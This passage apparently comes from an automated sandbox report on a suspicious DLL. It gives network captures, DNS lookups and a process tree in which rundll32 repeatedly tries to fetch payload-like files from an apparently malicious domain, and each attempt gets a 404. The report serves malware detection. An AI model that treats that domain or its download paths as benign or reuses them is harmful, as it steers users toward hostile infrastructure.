Aug 28, 2024 22:45:55.156755924 CEST | 49704 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:55.156771898 CEST | 443 | 49704 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:55.157991886 CEST | 49705 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:55.158011913 CEST | 443 | 49705 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:56.078687906 CEST | 443 | 49705 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:56.078716993 CEST | 443 | 49704 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:56.078809977 CEST | 49704 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:56.078814030 CEST | 49705 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:56.078883886 CEST | 49704 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:56.865137100 CEST | 49705 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:56.865163088 CEST | 443 | 49705 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:56.865509987 CEST | 443 | 49705 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:56.865641117 CEST | 49705 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:56.871886015 CEST | 49704 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:56.871911049 CEST | 443 | 49704 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:56.872271061 CEST | 443 | 49704 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:56.872328997 CEST | 49704 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:56.902126074 CEST | 49705 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:56.948498964 CEST | 443 | 49705 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:56.953058004 CEST | 49704 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:57.000497103 CEST | 443 | 49704 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:57.120518923 CEST | 49708 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:57.120553017 CEST | 443 | 49708 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:57.120626926 CEST | 49708 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:57.129367113 CEST | 49708 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:57.129379034 CEST | 443 | 49708 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:57.148355961 CEST | 49709 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:57.148390055 CEST | 443 | 49709 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:57.148453951 CEST | 49709 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:57.161968946 CEST | 49709 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:57.161983967 CEST | 443 | 49709 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:57.240781069 CEST | 443 | 49705 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:57.240835905 CEST | 49705 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:57.240847111 CEST | 443 | 49705 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:57.240885973 CEST | 49705 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:57.240914106 CEST | 443 | 49705 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:57.240973949 CEST | 443 | 49705 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:57.241014957 CEST | 49705 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:57.242014885 CEST | 49705 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:57.242024899 CEST | 443 | 49705 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:57.242062092 CEST | 49705 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:57.242074966 CEST | 49705 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:57.288619995 CEST | 443 | 49704 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:57.288685083 CEST | 49704 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:57.288707972 CEST | 443 | 49704 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:57.288752079 CEST | 49704 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:57.288758039 CEST | 443 | 49704 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:57.288779974 CEST | 443 | 49704 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:57.288800955 CEST | 49704 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:57.288825035 CEST | 49704 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:57.289872885 CEST | 49704 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:57.289882898 CEST | 443 | 49704 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:57.289891958 CEST | 49704 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:57.290067911 CEST | 49704 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:57.722307920 CEST | 49711 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:57.722347021 CEST | 443 | 49711 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:57.722428083 CEST | 49711 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:57.730087996 CEST | 49711 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:57.730103970 CEST | 443 | 49711 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:58.098442078 CEST | 443 | 49708 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:58.098736048 CEST | 49708 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:58.102935076 CEST | 49708 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:58.102941990 CEST | 443 | 49708 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:58.103215933 CEST | 443 | 49708 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:58.103271008 CEST | 49708 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:58.105104923 CEST | 49708 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:58.105103970 CEST | 443 | 49709 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:58.105171919 CEST | 49709 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:58.109622002 CEST | 49709 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:58.109632969 CEST | 443 | 49709 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:58.109874010 CEST | 443 | 49709 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:58.110085011 CEST | 49709 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:58.111784935 CEST | 49709 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:58.152498007 CEST | 443 | 49708 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:58.152512074 CEST | 443 | 49709 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:58.620194912 CEST | 49712 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:58.620230913 CEST | 443 | 49712 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:58.620402098 CEST | 49712 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:58.631628036 CEST | 49712 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:58.631647110 CEST | 443 | 49712 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:58.701950073 CEST | 443 | 49708 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:58.702121019 CEST | 443 | 49708 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:58.702187061 CEST | 49708 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:58.703712940 CEST | 443 | 49709 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:58.703871012 CEST | 443 | 49709 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:58.703922033 CEST | 49709 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:58.706404924 CEST | 49708 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:58.706422091 CEST | 443 | 49708 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:58.706437111 CEST | 49708 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:58.706460953 CEST | 49708 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:58.731487989 CEST | 49709 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:58.731508017 CEST | 443 | 49709 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:58.731533051 CEST | 49709 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:58.731554985 CEST | 49709 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:59.563813925 CEST | 443 | 49712 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:59.563956022 CEST | 49712 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:59.568371058 CEST | 49712 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:59.568377018 CEST | 443 | 49712 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:59.568732023 CEST | 443 | 49712 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:59.568804979 CEST | 49712 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:59.570513964 CEST | 49712 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:59.603842020 CEST | 443 | 49711 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:59.603914022 CEST | 49711 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:59.609014988 CEST | 49711 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:59.609026909 CEST | 443 | 49711 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:59.609307051 CEST | 443 | 49711 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:59.609369993 CEST | 49711 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:59.611387014 CEST | 49711 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:59.616499901 CEST | 443 | 49712 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:59.656500101 CEST | 443 | 49711 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:46:00.187422037 CEST | 443 | 49712 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:46:00.187477112 CEST | 49712 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:46:00.187493086 CEST | 443 | 49712 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:46:00.187546015 CEST | 49712 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:46:00.187577963 CEST | 443 | 49712 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:46:00.187660933 CEST | 443 | 49712 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:46:00.187679052 CEST | 49712 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:46:00.187704086 CEST | 49712 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:46:00.188194036 CEST | 49712 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:46:00.188215017 CEST | 443 | 49712 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:46:00.188222885 CEST | 49712 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:46:00.188277960 CEST | 49712 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:46:01.179564953 CEST | 443 | 49711 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:46:01.179737091 CEST | 443 | 49711 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:46:01.179771900 CEST | 49711 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:46:01.180006027 CEST | 49711 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:46:01.180243015 CEST | 49711 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:46:01.180243015 CEST | 49711 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:46:01.180270910 CEST | 443 | 49711 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:46:01.185206890 CEST | 49711 | 443 | 192.168.2.5 | 131.153.206.231
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 28, 2024 22:45:55.074853897 CEST | 56841 | 53 | 192.168.2.5 | 1.1.1.1
Aug 28, 2024 22:45:55.134756088 CEST | 53 | 56841 | 1.1.1.1 | 192.168.2.5
Aug 28, 2024 22:46:26.489363909 CEST | 53 | 52145 | 162.159.36.2 | 192.168.2.5
Aug 28, 2024 22:46:26.959573984 CEST | 60950 | 53 | 192.168.2.5 | 1.1.1.1
Aug 28, 2024 22:46:26.966577053 CEST | 53 | 60950 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 28, 2024 22:45:55.074853897 CEST | 192.168.2.5 | 1.1.1.1 | 0x6ca4 | Standard query (0) | rammenale.com | A (IP address) | IN (0x0001) | false
Aug 28, 2024 22:46:26.959573984 CEST | 192.168.2.5 | 1.1.1.1 | 0x21a7 | Standard query (0) | 198.187.3.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 28, 2024 22:45:55.134756088 CEST | 1.1.1.1 | 192.168.2.5 | 0x6ca4 | No error (0) | rammenale.com | | 131.153.206.231 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 22:46:26.966577053 CEST | 1.1.1.1 | 192.168.2.5 | 0x21a7 | Name error (3) | 198.187.3.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
HTTPS sessions: rammenale.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 131.153.206.231 | 443 | 7500 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-28 20:45:56 UTC | 287 | OUT | GET /for2/aclog.txt HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: rammenale.com
            Connection: Keep-Alive
2024-08-28 20:45:57 UTC | 416 | IN | HTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Wed, 28 Aug 2024 20:45:57 GMT
            server: LiteSpeed
            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-08-28 20:45:57 UTC | 952 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-08-28 20:45:57 UTC | 299 | IN | Data Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
            Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49704 | 131.153.206.231 | 443 | 7484 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-28 20:45:56 UTC | 287 | OUT | GET /for2/aclog.txt HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: rammenale.com
            Connection: Keep-Alive
2024-08-28 20:45:57 UTC | 416 | IN | HTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Wed, 28 Aug 2024 20:45:57 GMT
            server: LiteSpeed
            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
            2024-08-28 20:45:57 UTC | 952               | IN        | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
            2024-08-28 20:45:57 UTC | 299               | IN        | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


            Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
            2          | 192.168.2.5 | 49708       | 131.153.206.231 | 443              | 7756 | C:\Windows\SysWOW64\rundll32.exe
            Timestamp               | Bytes transferred | Direction | Data
            2024-08-28 20:45:58 UTC | 287               | OUT       | GET /for2/regit.tmp HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: rammenale.com
            Connection: Keep-Alive
            2024-08-28 20:45:58 UTC | 416               | IN        | HTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Wed, 28 Aug 2024 20:45:58 GMT
            server: LiteSpeed
            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
            2024-08-28 20:45:58 UTC | 952               | IN        | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
            2024-08-28 20:45:58 UTC | 299               | IN        | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


            Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
            3          | 192.168.2.5 | 49709       | 131.153.206.231 | 443              | 7748 | C:\Windows\SysWOW64\rundll32.exe
            Timestamp               | Bytes transferred | Direction | Data
            2024-08-28 20:45:58 UTC | 287               | OUT       | GET /for2/regit.tmp HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: rammenale.com
            Connection: Keep-Alive
            2024-08-28 20:45:58 UTC | 416               | IN        | HTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Wed, 28 Aug 2024 20:45:58 GMT
            server: LiteSpeed
            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
            2024-08-28 20:45:58 UTC | 952               | IN        | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
            2024-08-28 20:45:58 UTC | 299               | IN        | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


            Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
            4          | 192.168.2.5 | 49712       | 131.153.206.231 | 443              | 8024 | C:\Windows\SysWOW64\rundll32.exe
            Timestamp               | Bytes transferred | Direction | Data
            2024-08-28 20:45:59 UTC | 287               | OUT       | GET /for2/regit.tmp HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: rammenale.com
            Connection: Keep-Alive
            2024-08-28 20:46:00 UTC | 416               | IN        | HTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Wed, 28 Aug 2024 20:45:59 GMT
            server: LiteSpeed
            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
            2024-08-28 20:46:00 UTC | 952               | IN        | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
            2024-08-28 20:46:00 UTC | 299               | IN        | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


            Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
            5          | 192.168.2.5 | 49711       | 131.153.206.231 | 443              | 7952 | C:\Windows\SysWOW64\rundll32.exe
            Timestamp               | Bytes transferred | Direction | Data
            2024-08-28 20:45:59 UTC | 287               | OUT       | GET /for2/aclog.txt HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: rammenale.com
            Connection: Keep-Alive
            2024-08-28 20:46:01 UTC | 416               | IN        | HTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Wed, 28 Aug 2024 20:46:00 GMT
            server: LiteSpeed
            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
            2024-08-28 20:46:01 UTC | 952               | IN        | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
            2024-08-28 20:46:01 UTC | 299               | IN        | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content



            Target ID:0
            Start time:16:45:53
            Start date:28/08/2024
            Path:C:\Windows\System32\loaddll32.exe
            Wow64 process (32bit):true
            Commandline:loaddll32.exe "C:\Users\user\Desktop\Dll1.dll"
            Imagebase:0x330000
            File size:126'464 bytes
            MD5 hash:51E6071F9CBA48E79F10C84515AAE618
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:1
            Start time:16:45:53
            Start date:28/08/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff6d64d0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:2
            Start time:16:45:53
            Start date:28/08/2024
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Dll1.dll",#1
            Imagebase:0x790000
            File size:236'544 bytes
            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:3
            Start time:16:45:53
            Start date:28/08/2024
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Users\user\Desktop\Dll1.dll,mydllmain
            Imagebase:0x330000
            File size:61'440 bytes
            MD5 hash:889B99C52A60DD49227C5E485A016679
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:4
            Start time:16:45:53
            Start date:28/08/2024
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe "C:\Users\user\Desktop\Dll1.dll",#1
            Imagebase:0x330000
